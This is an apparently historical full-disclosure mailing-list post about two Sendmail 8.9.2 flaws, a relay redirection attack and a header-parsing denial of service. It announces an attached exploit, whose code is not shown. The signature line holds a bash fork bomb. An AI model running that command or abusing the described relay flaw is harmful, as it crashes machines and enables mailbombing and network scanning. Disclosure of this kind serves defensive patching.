Hello again.

Yesterday, I published some rather laconic information about two bugs in Sendmail up to 8.9.2, and decided to post only a short description of the problem + suggested patch (instead of an exploit), to give developers a chance. Unfortunately, I put together information about two completely different problems in a single posting, and it confused a lot of people. So, to kill any senseless discussions - again:

- The first one was the 'redirection attack'; I said you could call it a 'bug' instead of a 'feature', but as no one likes anonymous mailbombing, network overloading / scanning, it's good to apply the sendmail.cf patch included in the original posting; without it, your relay could be abused in many painful ways. And yes, the attack has been confirmed with 8.9.2 and sendmail.cf from 8.9.2 with relaying enabled. I don't think there's anything left to talk about. Dot.

- The second one was a DoS attack during headers parsing - and this is a bug, *confirmed on 8.9.2*. I included a simple patch to the source tree. Unfortunately, all the feedback we received from developers was a one-line response: 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided not to publish an exploit, but now I realized there's no chance of a response from vendors if there's no real danger. So here it is. The attached file, against.c, should perform a very 'light' attack, only for testing purposes. If you notice increased LA during the attack, your machine is vulnerable.

You had enough time to patch your system - don't blame me, but vendors.

EOF.
_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]

[Attachment: against.c]